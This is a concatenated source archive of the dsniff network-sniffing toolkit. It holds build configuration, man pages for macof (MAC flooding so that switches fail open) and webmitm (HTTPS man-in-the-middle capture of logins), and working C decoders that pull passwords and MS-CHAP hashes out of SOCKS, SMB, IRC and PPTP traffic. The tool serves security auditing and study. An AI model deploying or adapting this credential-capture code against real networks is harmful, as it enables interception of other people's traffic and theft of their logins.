${prefix}/BerkeleyDB.3.1 ${prefix}/BerkeleyDB.3.0 \ ${prefix}/BerkeleyDB ${prefix}/db ${prefix}; do if test -f ${dir}/include/db_185.h; then AC_DEFINE(HAVE_DB_185_H) DBINC="-I${dir}/include" DBLIB="-L${dir}/lib -ldb" have_db=yes break elif test -f ${dir}/include/db.h; then AC_DEFINE(HAVE_DB_H) DBINC="-I${dir}/include" DBLIB="-L${dir}/lib -ldb" have_db=yes break fi done if test "x$have_db" = "x"; then if test -f /usr/include/db2/db_185.h; then AC_DEFINE(HAVE_DB_185_H) DBINC="-I/usr/include/db2" DBLIB="-ldb2" have_db=yes elif test -f /usr/include/db_185.h; then AC_DEFINE(HAVE_DB_185_H) DBLIB="-ldb" have_db=yes elif test -f /usr/include/db.h; then AC_DEFINE(HAVE_DB_H) have_db=yes fi fi if test "x$have_db" = "x"; then AC_MSG_ERROR(Berkeley DB with 1.85 compatibility not found) fi AC_MSG_RESULT(yes) ] ) AC_SUBST(DBINC) AC_SUBST(DBLIB) fi AC_SUBST(LDFLAGS_STATIC) dnl Checks for libpcap AC_MSG_CHECKING(for libpcap) AC_ARG_WITH(libpcap, [ --with-libpcap=DIR use libpcap in DIR], [ case "$withval" in yes|no) AC_MSG_RESULT(no) ;; *) AC_MSG_RESULT($withval) if test -f $withval/pcap.h -a -f $withval/libpcap.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi PCAPINC="-I$withval -I$withval/bpf" PCAPLIB="-L$withval -lpcap" elif test -f $withval/include/pcap.h -a \ -f $withval/include/net/bpf.h -a \ -f $withval/lib/libpcap.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi PCAPINC="-I$withval/include" PCAPLIB="-L$withval/lib -lpcap" else AC_MSG_ERROR(pcap.h,net/bpf.h,or libpcap.a not found in $withval) fi ;; esac ], [ if test -f ${prefix}/include/pcap.h; then PCAPINC="-I${prefix}/include" PCAPLIB="-L${prefix}/lib -lpcap" elif test -f /usr/include/pcap/pcap.h; then PCAPINC="-I/usr/include/pcap" PCAPLIB="-lpcap" elif test -f /usr/include/pcap.h; then PCAPLIB="-lpcap" else AC_MSG_RESULT(no) AC_MSG_ERROR(libpcap not found) fi AC_MSG_RESULT(yes) ] ) AC_SUBST(PCAPINC) AC_SUBST(PCAPLIB) dnl Checks for libnet AC_MSG_CHECKING(for libnet) AC_ARG_WITH(libnet, [ --with-libnet=DIR use libnet in DIR], [ case "$withval" in yes|no) AC_MSG_RESULT(no) ;; *) AC_MSG_RESULT($withval) if test -f $withval/include/libnet.h -a -f $withval/lib/libnet.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi if test -f $withval/bin/libnet-config; then CFLAGS="$CFLAGS `$withval/bin/libnet-config --defines`" elif test -f $withval/libnet-config; then CFLAGS="$CFLAGS `$withval/libnet-config --defines`" else CFLAGS="$CFLAGS `libnet-config --defines`" fi LNETINC="-I$withval/include" LNETLIB="-L$withval/lib -lnet" else AC_MSG_ERROR(libnet.h or libnet.a not found in $withval) fi ;; esac ], [ if test -f ${prefix}/include/libnet.h; then CFLAGS="$CFLAGS `${prefix}/bin/libnet-config --defines`" LNETINC="-I${prefix}/include" LNETLIB="-L${prefix}/lib -lnet" elif test -f /usr/include/libnet.h; then CFLAGS="$CFLAGS `libnet-config --defines`" LNETLIB="-lnet" else AC_MSG_RESULT(no) AC_MSG_ERROR(libnet not found) fi AC_MSG_RESULT(yes) ] ) AC_SUBST(LNETINC) AC_SUBST(LNETLIB) dnl Checks for libnids AC_MSG_CHECKING(for libnids) AC_ARG_WITH(libnids, [ --with-libnids=DIR use libnids in DIR], [ case "$withval" in yes|no) AC_MSG_RESULT(no) ;; *) AC_MSG_RESULT($withval) if test -f $withval/src/nids.h -a -f $withval/src/libnids.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi NIDSINC="-I$withval/src" NIDSLIB="-L$withval/src -lnids" elif test -f $withval/include/nids.h -a -f $withval/lib/libnids.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi NIDSINC="-I$withval/include" NIDSLIB="-L$withval/lib -lnids" else AC_MSG_ERROR(nids.h or libnids.a not found in $withval) fi ;; esac ], [ if test -f ${prefix}/include/nids.h; then NIDSINC="-I${prefix}/include" NIDSLIB="-L${prefix}/lib -lnids" elif test -f /usr/include/nids.h; then NIDSLIB="-lnids" else AC_MSG_RESULT(no) AC_MSG_ERROR(libnids not found) fi AC_MSG_RESULT(yes) ] ) save_cppflags="$CPPFLAGS" CPPFLAGS="$NIDSINC" AC_MSG_CHECKING(whether libnids version is good) AC_EGREP_HEADER(pcap_filter, nids.h, AC_MSG_RESULT(yes), [ AC_MSG_RESULT(no); AC_MSG_ERROR(libnids version 1.13 or greater required) ]) CPPFLAGS="$save_cppflags" AC_SUBST(NIDSINC) AC_SUBST(NIDSLIB) dnl Checks for OpenSSL AC_MSG_CHECKING(for OpenSSL) AC_ARG_WITH(openssl, [ --with-openssl=DIR use OpenSSL in DIR], [ case "$withval" in yes|no) AC_MSG_RESULT(no) ;; *) AC_MSG_RESULT($withval) if test -f $withval/include/openssl/ssl.h -a -f $withval/libssl.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi SSLINC="-I$withval/include" SSLLIB="-L$withval -lssl -lcrypto" elif test -f $withval/include/openssl/ssl.h -a \ -f $withval/lib/libssl.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi SSLINC="-I$withval/include" SSLLIB="-L$withval/lib -lssl -lcrypto" else AC_MSG_ERROR(ssl.h or libssl.a not found in $withval) fi WEBMITM="webmitm" ;; esac ], [ if test -f ${prefix}/include/openssl/ssl.h; then SSLINC="-I${prefix}/include" SSLLIB="-L${prefix}/lib -lssl -lcrypto" elif test -f ${prefix}/ssl/include/openssl/ssl.h; then SSLINC="-I${prefix}/ssl/include" SSLLIB="-L${prefix}/ssl/lib -lssl -lcrypto" elif test -f /usr/include/openssl/ssl.h; then SSLLIB="-lssl -lcrypto" else AC_MSG_RESULT(no) AC_MSG_ERROR(OpenSSL not found) fi AC_MSG_RESULT(yes) ] ) AC_SUBST(SSLINC) AC_SUBST(SSLLIB) AC_CONFIG_FILES([Makefile]) AC_OUTPUT hackerschoice-dsniff-a17510d/macof.80000664000175000017500000000205715105626144017174 0ustar epsilonepsilon.TH MACOF 8 .ad .fi .SH NAME macof \- flood a switched LAN with random MAC addresses .SH SYNOPSIS .na .nf .fi \fBmacof\fR [\fB-i \fIinterface\fR] [\fB-s \fIsrc\fR] [\fB-d \fIdst\fR] [\fB-e \fItha\fR] [\fB-x \fIsport\fR] [\fB-y \fIdport\fR] [\fB-n \fItimes\fR] .SH DESCRIPTION .ad .fi \fBmacof\fR floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). A straight C port of the original Perl Net::RawIP macof program by Ian Vitek . .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to send on. .IP "\fB-s \fIsrc\fR" Specify source IP address. .IP "\fB-d \fIdst\fR" Specify destination IP address. .IP "\fB-e \fItha\fR" Specify target hardware address. .IP "\fB-x \fIsport\fR" Specify TCP source port. .IP "\fB-y \fIdport\fR" Specify TCP destination port. .IP "\fB-n \fItimes\fR" Specify the number of packets to send. .LP Values for any options left unspecified will be generated randomly. .SH "SEE ALSO" dsniff(8) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/decode_socks.c0000664000175000017500000000177415105626144020614 0ustar epsilonepsilon/* * decode_socks.c * * NEC SOCKS. * * Copyright (c) 2000 Dug Song * * $Id: decode_socks.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "decode.h" int decode_socks(u_char *buf, int len, u_char *obuf, int olen) { u_char *p; int i, n; p = buf; if (len < 4 || *p++ != 5) /* SOCKS version */ return (0); if ((n = *p++) > len - 5) /* nmethods */ return (0); for (i = 0; i < n; i++) /* USERNAME/PASSWORD method? */ if (p[i] == 2) break; if (i == n) return (0); p += n; if (*p++ != 1) return (0); /* USERNAME/PASSWORD version */ n = *p++; if (n > len - (p - buf)) return (0); memmove(p - 1, p, n); p[n - 1] = '\0'; snprintf(obuf, olen, "%s ", p - 1); p += n; n = *p++; if (n > len - (p - buf)) return (0); memmove(p - 1, p, n); p[n - 1] = '\0'; strlcat(obuf, p - 1, olen); strlcat(obuf, "\n", olen); return (strlen(obuf)); } hackerschoice-dsniff-a17510d/magic.h0000664000175000017500000000052315105626144017243 0ustar epsilonepsilon/* * magic.h * * Network application protocol identification, based on file(1) magic. * * Copyright (c) 2000 Dug Song * * $Id: magic.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef MAGIC_H #define MAGIC_H void magic_init(char *filename); char *magic_match(u_char *buf, int len); #endif /* MAGIC_H */ hackerschoice-dsniff-a17510d/webmitm.80000664000175000017500000000132215105626144017545 0ustar epsilonepsilon.TH WEBMITM 8 .ad .fi .SH NAME webmitm \- HTTP / HTTPS monkey-in-the-middle .SH SYNOPSIS .na .nf .fi \fBwebmitm\fR [\fB-d\fR] [\fBhost\fR] .SH DESCRIPTION .ad .fi \fBwebmitm\fR transparently proxies and sniffs HTTP / HTTPS traffic redirected by dnsspoof(8), capturing most "secure" SSL-encrypted webmail logins and form submissions. .SH OPTIONS .IP \fB-d\fR Enable debugging mode. May be specified multiple times to greater effect. .IP \fBhost\fR Specify a host to proxy to. If none given, only requests containing an HTTP/1.1 Host: header or absolute URI will be relayed transparently. .SH FILES .IP \fIwebmitm.crt\fR SSL certificate .SH "SEE ALSO" dsniff(8), dnsspoof(8) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/asn1.h0000664000175000017500000000051015105626144017021 0ustar epsilonepsilon/* * asn1.h * * ASN.1 routines. * * Copyright (c) 2000 Dug Song * * $Id: asn1.h,v 1.3 2001/03/15 08:33:05 dugsong Exp $ */ #ifndef ASN1_H #define ASN1_H #define ASN1_INTEGER 2 #define ASN1_STRING 4 #define ASN1_SEQUENCE 16 int asn1_type(buf_t buf); int asn1_len(buf_t buf); #endif /* ASN1_H */ hackerschoice-dsniff-a17510d/decode_smb.c0000664000175000017500000000340515105626144020244 0ustar epsilonepsilon/* * decode_smb.c * * Microsoft Server Message Block. * * Copyright (c) 2000 Dug Song * * $Id: decode_smb.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include "decode.h" struct smbhdr { u_char proto[4]; u_char cmd; u_char err[4]; u_char flags1; u_short flags2; u_short pad[6]; u_short tid, pid, uid, mid; }; int decode_smb(u_char *buf, int len, u_char *obuf, int olen) { struct smbhdr *smb; int i, j, k; u_char *p, *q, *end; char *user, *pass; obuf[0] = '\0'; /* Skip NetBIOS session request. */ if (len < 4 || buf[0] != 0x81) return (0); buf += 2; GETSHORT(i, buf); len -= 4; if (len < i) return (0); buf += i; len -= i; end = buf + len; /* Parse SMBs. */ for (p = buf; p < end; p += i) { GETLONG(i, p); if (i > end - p || i < sizeof(*smb) + 32) continue; smb = (struct smbhdr *)p; if (memcmp(smb->proto, "\xffSMB", 4) != 0 || smb->cmd != 0x73) continue; user = pass = NULL; q = (u_char *)(smb + 1); if (*q == 10) { /* Pre NT LM 0.12 */ q += 15; j = pletohs(q); q += 2; if (j > i - (sizeof(*smb) + 15 + 6)) continue; pass = q + 6; user = pass + j; } else if (*q == 13) { /* NT LM 0.12 */ q += 15; j = pletohs(q); q += 2; k = pletohs(q); if (j > i - ((q - p) + 12) || k > i - ((q - p) + 11)) continue; pass = q + 12; user = pass + j + k; } else continue; /* XXX - skip null IPC sessions, etc. */ if (user && pass && strlen(user) && is_ascii_string(pass, j - 1)) { strlcat(obuf, user, olen); strlcat(obuf, " ", olen); strlcat(obuf, pass, olen); strlcat(obuf, "\n", olen); } } return (strlen(obuf)); } hackerschoice-dsniff-a17510d/decode_irc.c0000664000175000017500000000316115105626144020237 0ustar epsilonepsilon/* * decode_irc.c * * Internet Relay Chat. * * Copyright (c) 2000 Dug Song * * $Id: decode_irc.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" int decode_irc(u_char *buf, int len, u_char *obuf, int olen) { struct buf *line, inbuf, outbuf; int i, got_auth; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); got_auth = 0; while ((i = buf_index(&inbuf, "\n", 1)) != -1) { line = buf_tok(&inbuf, NULL, i); buf_skip(&inbuf, 1); if (i > 0 && line->base[i - 1] == '\r') line->end--; line->base[line->end] = '\0'; if (buf_cmp(&inbuf, ";", 1) == 0) { if ((i = buf_index(line, " ", 1)) < 0) continue; buf_skip(line, i + 1); } if (buf_cmp(line, "USER ", 5) == 0 || buf_cmp(line, "NICK ", 5) == 0) { buf_rewind(line); buf_putf(&outbuf, "%s\n", buf_ptr(line)); } else if (buf_cmp(line, "PASS ", 5) == 0 || buf_cmp(line, "OPER ", 5) == 0) { buf_rewind(line); buf_putf(&outbuf, "%s\n", buf_ptr(line)); got_auth = 1; } else if (buf_cmp(line, "MODE ", 5) == 0 && buf_index(line, " +k ", 4) != -1) { buf_rewind(line); buf_putf(&outbuf, "%s\n", buf_ptr(line)); got_auth = 1; } else if (buf_cmp(line, "JOIN ", 5) == 0) { buf_skip(line, 5); if ((i = buf_index(line, " ", 1)) < 0) continue; buf_skip(line, i + 1); if (buf_len(line) < 1) continue; buf_rewind(line); buf_putf(&outbuf, "%s\n", buf_ptr(line)); got_auth = 1; } } buf_end(&outbuf); return (got_auth ? buf_len(&outbuf) : 0); } hackerschoice-dsniff-a17510d/decode_pptp.c0000664000175000017500000001151515105626144020447 0ustar epsilonepsilon/* * decode_pptp.c * * Microsoft PPTP MS-CHAP. Derived from Aleph One's anger.c. * * Copyright (c) 2000 Dug Song * Copyright (c) 2000 Aleph One * * $Id: decode_pptp.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include "buf.h" #include "decode.h" struct pptp_gre_header { u_char flags; /* bitfield */ u_char ver; /* should be PPTP_GRE_VER (enhanced GRE) */ u_short protocol; /* should be PPTP_GRE_PROTO (ppp-encaps) */ u_short payload_len; /* size of ppp payload, not inc. gre header */ u_short call_id; /* peer's call_id for this session */ u_int32_t seq; /* sequence number. Present if S==1 */ u_int32_t ack; /* seq number of highest packet recieved by */ /* sender in this session */ }; #define PPTP_GRE_PROTO 0x880B #define PPTP_GRE_VER 0x1 #define PPTP_GRE_IS_C(f) ((f) & 0x80) #define PPTP_GRE_IS_R(f) ((f) & 0x40) #define PPTP_GRE_IS_K(f) ((f) & 0x20) #define PPTP_GRE_IS_S(f) ((f) & 0x10) #define PPTP_GRE_IS_A(f) ((f) & 0x80) struct ppp_header { u_char address; u_char control; u_short proto; }; #define PPP_PROTO_CHAP 0xc223 struct ppp_lcp_chap_header { u_char code; u_char ident; u_short length; }; #define PPP_CHAP_CODE_CHALLENGE 1 #define PPP_CHAP_CODE_RESPONSE 2 struct ppp_chap_challenge { u_char size; union { u_char challenge_v1[8]; u_char challenge_v2[16]; struct { u_char lanman[24]; u_char nt[24]; u_char flag; } response_v1; struct { u_char peer_challenge[16]; u_char reserved[8]; u_char nt[24]; u_char flag; } response_v2; } value; /* name */ }; struct challenge { u_char version; u_char challenge[16]; }; int decode_pptp(u_char *buf, int len, u_char *obuf, int olen) { static struct challenge save_challenge; struct buf outbuf; struct pptp_gre_header *pgh; struct ppp_header *ppp; struct ppp_lcp_chap_header *chap; struct ppp_chap_challenge *chapch; u_short proto; u_char *p, name[64], digest[SHA_DIGEST_LENGTH]; SHA_CTX ctx; int i, pghlen; buf_init(&outbuf, obuf, olen); if (len < (pghlen = sizeof(*pgh))) return (0); pgh = (struct pptp_gre_header *)buf; if ((pgh->ver & 0x7f) != PPTP_GRE_VER || ntohs(pgh->protocol) != PPTP_GRE_PROTO || PPTP_GRE_IS_C(pgh->flags) || PPTP_GRE_IS_R(pgh->flags) || PPTP_GRE_IS_K(pgh->flags) == 0 || (pgh->flags & 0xf) != 0) { return (0); } if (PPTP_GRE_IS_S(pgh->flags) == 0) return (0); if (PPTP_GRE_IS_A(pgh->ver) == 0) pghlen -= sizeof(pgh->ack); if (len - pghlen < ntohs(pgh->payload_len)) return (0); ppp = (struct ppp_header *)(pgh + 1); if (ppp->address != 0xff && ppp->control != 0x3) { proto = pntohs(ppp); chap = (struct ppp_lcp_chap_header *) ((u_char *)ppp + sizeof(proto)); } else { proto = ntohs(ppp->proto); chap = (struct ppp_lcp_chap_header *)(ppp + 1); } if (proto != PPP_PROTO_CHAP) return (0); switch (chap->code) { case PPP_CHAP_CODE_CHALLENGE: chapch = (struct ppp_chap_challenge *)(chap + 1); if (chapch->size == 8) { save_challenge.version = 1; memcpy(save_challenge.challenge, chapch->value.challenge_v1, 8); } else if (chapch->size == 16) { save_challenge.version = 2; memcpy(save_challenge.challenge, chapch->value.challenge_v2, 16); } else save_challenge.version = 0; break; case PPP_CHAP_CODE_RESPONSE: if (save_challenge.version == 0) break; chapch = (struct ppp_chap_challenge *)(chap + 1); i = ntohs(chap->length) - 54; if (i > 63) i = 63; memcpy(name, (u_char *)chap + 54, i); name[i] = '\0'; buf_putf(&outbuf, "%s:0:", name); if (save_challenge.version == 1) { for (i = 0; i < 8; i++) { buf_putf(&outbuf, "%02X", save_challenge.challenge[i]); } buf_put(&outbuf, ":", 1); for (i = 0; i < 24; i++) { buf_putf(&outbuf, "%02X", chapch->value.response_v1.lanman[i]); } buf_put(&outbuf, ":", 1); for (i = 0; i < 24; i++) { buf_putf(&outbuf, "%02X", chapch->value.response_v1.nt[i]); } buf_put(&outbuf, "\n", 1); } else if (save_challenge.version == 2) { chapch = (struct ppp_chap_challenge *)(chap + 1); if ((p = strchr(name, '\\')) == NULL) p = name; SHA1_Init(&ctx); SHA1_Update(&ctx, chapch->value.response_v2.peer_challenge, 16); SHA1_Update(&ctx, save_challenge.challenge, 16); SHA1_Update(&ctx, p, strlen(p)); SHA1_Final(digest, &ctx); for (i = 0; i < 8; i++) { buf_putf(&outbuf, "%02X", digest[i]); } buf_putf(&outbuf, ":000000000000000000000000000000000000000000000000:"); for (i = 0; i < 24; i++) { buf_putf(&outbuf, "%02X", chapch->value.response_v2.nt[i]); } buf_put(&outbuf, "\n", 1); save_challenge.version = 0; } break; } buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/base64.c0000664000175000017500000002062515105626144017247 0ustar epsilonepsilon/* $Id: base64.c,v 1.4 2001/03/15 08:32:59 dugsong Exp $ * * Copyright (c) 1996 by Internet Software Consortium. * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS * ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE * CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL * DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR * PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS * ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS * SOFTWARE. */ /* * Portions Copyright (c) 1995 by International Business Machines, Inc. * * International Business Machines, Inc. (hereinafter called IBM) grants * permission under its copyrights to use, copy, modify, and distribute this * Software with or without fee, provided that the above copyright notice and * all paragraphs of this notice appear in all copies, and that the name of IBM * not be used in connection with the marketing of any product incorporating * the Software or modifications thereof, without specific, written prior * permission. * * To the extent it has a right to do so, IBM grants an immunity from suit * under its patents, if any, for the use, sale or manufacture of products to * the extent that such products are used for performing Domain Name System * dynamic updates in TCP/IP networks by means of the Software. No immunity is * granted for any product per se or for any other function of any product. * * THE SOFTWARE IS PROVIDED "AS IS", AND IBM DISCLAIMS ALL WARRANTIES, * INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A * PARTICULAR PURPOSE. IN NO EVENT SHALL IBM BE LIABLE FOR ANY SPECIAL, * DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER ARISING * OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE, EVEN * IF IBM IS APPRISED OF THE POSSIBILITY OF SUCH DAMAGES. */ #include #include #include #include #include #include "base64.h" #define Assert(Cond) if (!(Cond)) abort() static const char Base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; static const char Pad64 = '='; /* (From RFC1521 and draft-ietf-dnssec-secext-03.txt) The following encoding technique is taken from RFC 1521 by Borenstein and Freed. It is reproduced here in a slightly edited form for convenience. A 65-character subset of US-ASCII is used, enabling 6 bits to be represented per printable character. (The extra 65th character, "=", is used to signify a special processing function.) The encoding process represents 24-bit groups of input bits as output strings of 4 encoded characters. Proceeding from left to right, a 24-bit input group is formed by concatenating 3 8-bit input groups. These 24 bits are then treated as 4 concatenated 6-bit groups, each of which is translated into a single digit in the base64 alphabet. Each 6-bit group is used as an index into an array of 64 printable characters. The character referenced by the index is placed in the output string. Table 1: The Base64 Alphabet Value Encoding Value Encoding Value Encoding Value Encoding 0 A 17 R 34 i 51 z 1 B 18 S 35 j 52 0 2 C 19 T 36 k 53 1 3 D 20 U 37 l 54 2 4 E 21 V 38 m 55 3 5 F 22 W 39 n 56 4 6 G 23 X 40 o 57 5 7 H 24 Y 41 p 58 6 8 I 25 Z 42 q 59 7 9 J 26 a 43 r 60 8 10 K 27 b 44 s 61 9 11 L 28 c 45 t 62 + 12 M 29 d 46 u 63 / 13 N 30 e 47 v 14 O 31 f 48 w (pad) = 15 P 32 g 49 x 16 Q 33 h 50 y Special processing is performed if fewer than 24 bits are available at the end of the data being encoded. A full encoding quantum is always completed at the end of a quantity. When fewer than 24 input bits are available in an input group, zero bits are added (on the right) to form an integral number of 6-bit groups. Padding at the end of the data is performed using the '=' character. Since all base64 input is an integral number of octets, only the ------------------------------------------------- following cases can arise: (1) the final quantum of encoding input is an integral multiple of 24 bits; here, the final unit of encoded output will be an integral multiple of 4 characters with no "=" padding, (2) the final quantum of encoding input is exactly 8 bits; here, the final unit of encoded output will be two characters followed by two "=" padding characters, or (3) the final quantum of encoding input is exactly 16 bits; here, the final unit of encoded output will be three characters followed by one "=" padding character. */ /* skips all whitespace anywhere. converts characters, four at a time, starting at (or after) src from base - 64 numbers into three 8 bit bytes in the target area. it returns the number of data bytes stored at the target, or -1 on error. */ int base64_pton(src, target, targsize) char const *src; u_char *target; size_t targsize; { int tarindex, state, ch; char *pos; state = 0; tarindex = 0; while ((ch = *src++) != '\0') { if (isspace(ch)) /* Skip whitespace anywhere. */ continue; if (ch == Pad64) break; pos = strchr(Base64, ch); if (pos == 0) /* A non-base64 character. */ return (-1); switch (state) { case 0: if (target) { if (tarindex >= targsize) return (-1); target[tarindex] = (pos - Base64) << 2; } state = 1; break; case 1: if (target) { if (tarindex + 1 >= targsize) return (-1); target[tarindex] |= (pos - Base64) >> 4; target[tarindex+1] = ((pos - Base64) & 0x0f) << 4 ; } tarindex++; state = 2; break; case 2: if (target) { if (tarindex + 1 >= targsize) return (-1); target[tarindex] |= (pos - Base64) >> 2; target[tarindex+1] = ((pos - Base64) & 0x03) << 6; } tarindex++; state = 3; break; case 3: if (target) { if (tarindex >= targsize) return (-1); target[tarindex] |= (pos - Base64); } tarindex++; state = 0; break; } } /* * We are done decoding Base-64 chars. Let's see if we ended * on a byte boundary, and/or with erroneous trailing characters. */ if (ch == Pad64) { /* We got a pad char. */ ch = *src++; /* Skip it, get next. */ switch (state) { case 0: /* Invalid = in first position */ case 1: /* Invalid = in second position */ return (-1); case 2: /* Valid, means one byte of info */ /* Skip any number of spaces. */ for (; ch != '\0'; ch = *src++) if (!isspace(ch)) break; /* Make sure there is another trailing = sign. */ if (ch != Pad64) return (-1); ch = *src++; /* Skip the = */ /* Fall through to "single trailing =" case. */ /* FALLTHROUGH */ case 3: /* Valid, means two bytes of info */ /* * We know this char is an =. Is there anything but * whitespace after it? */ for (; ch != '\0'; ch = *src++) if (!isspace(ch)) return (-1); /* * Now make sure for cases 2 and 3 that the "extra" * bits that slopped past the last full byte were * zeros. If we don't check them, they become a * subliminal channel. */ if (target && target[tarindex] != 0) return (-1); } } else { /* * We ended by seeing the end of the string. Make sure we * have no partial bytes lying around. */ if (state != 0) return (-1); } return (tarindex); } hackerschoice-dsniff-a17510d/magic.c0000664000175000017500000004404315105626144017243 0ustar epsilonepsilon/* * magic.c * * Network application protocol identification, based on file(1) magic. * * Copyright (c) 2000 Dug Song * Copyright (c) 1987 Ian F. Darwin * * This software is not subject to any license of the American Telephone * and Telegraph Company or of the Regents of the University of California. * * Permission is granted to anyone to use this software for any purpose on * any computer system, and to alter it and redistribute it freely, subject * to the following restrictions: * * 1. The author is not responsible for the consequences of use of this * software, no matter how awful, even if they arise from flaws in it. * * 2. The origin of this software must not be misrepresented, either by * explicit claim or by omission. Since few users ever read sources, * credits must appear in the documentation. * * 3. Altered versions must be plainly marked as such, and must not be * misrepresented as being the original software. Since few users * ever read sources, credits must appear in the documentation. * * 4. This notice may not be removed or altered. * * $Id: magic.c,v 1.9 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include "options.h" #include "pathnames.h" #include "magic.h" #include "dsniff_magic.h" #include "decode.h" #define LOWCASE(p) (isupper((u_char) (p)) ? tolower((u_char) (p)) : (p)) #define INDIR 1 /* if '>(...)' appears, */ #define UNSIGNED 2 /* comparison is unsigned */ #define ADD 4 /* if '>&' appears, */ #define BYTE 1 #define SHORT 2 #define LONG 4 #define STRING 5 #define DATE 6 #define BESHORT 7 #define BELONG 8 #define BEDATE 9 #define LESHORT 10 #define LELONG 11 #define LEDATE 12 struct magic { short flag; short cont_level; struct { int8_t type; /* byte short long */ int32_t offset; /* offset from indirection */ } in; int32_t offset; /* offset to magic number. */ u_char reln; /* relation (0=eq, '>'=gt, etc.) */ int8_t type; /* int, short, long or string */ char vallen; /* length of string value, if any */ union VALUETYPE { u_char b; u_short h; u_int32_t l; char s[32]; u_char hs[2]; /* 2 bytes of a fixed-endian "short" */ u_char hl[4]; /* 4 bytes of a fixed-endian "long" */ } value; /* either number or string */ u_int32_t mask; /* mask before comparison with value */ char desc[50]; /* description */ }; static char *Magictypes[12] = { "byte", "short", "null", "long", "string", "date", "beshort", "belong", "bedate", "leshort", "lelong", "ledate", }; static struct magic Magic[512]; static int Magiccnt = 0; static int Magicmax = sizeof(Magic) / sizeof(Magic[0]); static char Match[128]; static void eatsize(char **p) { char *l = *p; if (LOWCASE(*l) == 'u') l++; switch (LOWCASE(*l)) { case 'l': /* long */ case 's': /* short */ case 'h': /* short */ case 'b': /* char/byte */ case 'c': /* char/byte */ l++; /*FALLTHROUGH*/ default: break; } *p = l; } /* Single hex char to int; -1 if not a hex char. */ static int hextoint(int c) { if (!isascii((u_char) c)) return (-1); if (isdigit((u_char) c)) return (c - '0'); if ((c >= 'a') && (c <= 'f')) return (c + 10 - 'a'); if ((c >= 'A') && (c <= 'F')) return (c + 10 - 'A'); return (-1); } /* * Convert a string containing C character escapes. Stop at an unescaped * space or tab. * Copy the converted version to "p", returning its length in *slen. * Return updated scan pointer as function result. */ static char * getstr(char *s, char *p, int plen, int *slen) { char *origs = s, *origp = p; char *pmax = p + plen - 1; int c; int val; while ((c = *s++) != '\0') { if (isspace((u_char) c)) break; if (p >= pmax) { warnx("getstr: string too long: %s", origs); break; } if (c == '\\') { switch ((c = *s++)) { case '\0': goto out; default: *p++ = (char) c; break; case 'n': *p++ = '\n'; break; case 'r': *p++ = '\r'; break; case 'b': *p++ = '\b'; break; case 't': *p++ = '\t'; break; case 'f': *p++ = '\f'; break; case 'v': *p++ = '\v'; break; /* \ and up to 3 octal digits */ case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': val = c - '0'; c = *s++; /* try for 2 */ if (c >= '0' && c <= '7') { val = (val << 3) | (c - '0'); c = *s++; /* try for 3 */ if (c >= '0' && c <= '7') val = (val << 3) | (c - '0'); else --s; } else --s; *p++ = (char) val; break; /* \x and up to 2 hex digits */ case 'x': val = 'x'; /* Default if no digits */ c = hextoint(*s++); /* Get next char */ if (c >= 0) { val = c; c = hextoint(*s++); if (c >= 0) val = (val << 4) + c; else --s; } else --s; *p++ = (char) val; break; } } else *p++ = (char) c; } out: *p = '\0'; *slen = p - origp; return (s); } /* Extend the sign bit if the comparison is to be signed. */ static u_int32_t signextend(struct magic *m, u_int32_t v) { if (!(m->flag & UNSIGNED)) return (v); switch(m->type) { /* * Do not remove the casts below. They are * vital. When later compared with the data, * the sign extension must have happened. */ case BYTE: v = (char) v; break; case SHORT: case BESHORT: case LESHORT: v = (short) v; break; case DATE: case BEDATE: case LEDATE: case LONG: case BELONG: case LELONG: v = (int32_t) v; break; case STRING: break; default: warnx("sign_extend: can't happen: m->type = %d", m->type); return (-1); } return (v); } /* * Read a numeric value from a pointer, into the value union of a magic * pointer, according to the magic type. Update the string pointer to point * just after the number read. Return 0 for success, non-zero for failure. */ static int getvalue(struct magic *m, char **p) { int slen; if (m->type == STRING) { *p = getstr(*p, m->value.s, sizeof(m->value.s), &slen); m->vallen = slen; } else if (m->reln != 'x') { m->value.l = signextend(m, strtoul(*p, p, 0)); eatsize(p); } 